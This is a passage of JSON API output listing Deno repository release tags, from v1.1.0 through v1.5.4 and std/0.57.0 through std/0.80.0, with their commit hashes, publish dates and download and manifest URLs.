s/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":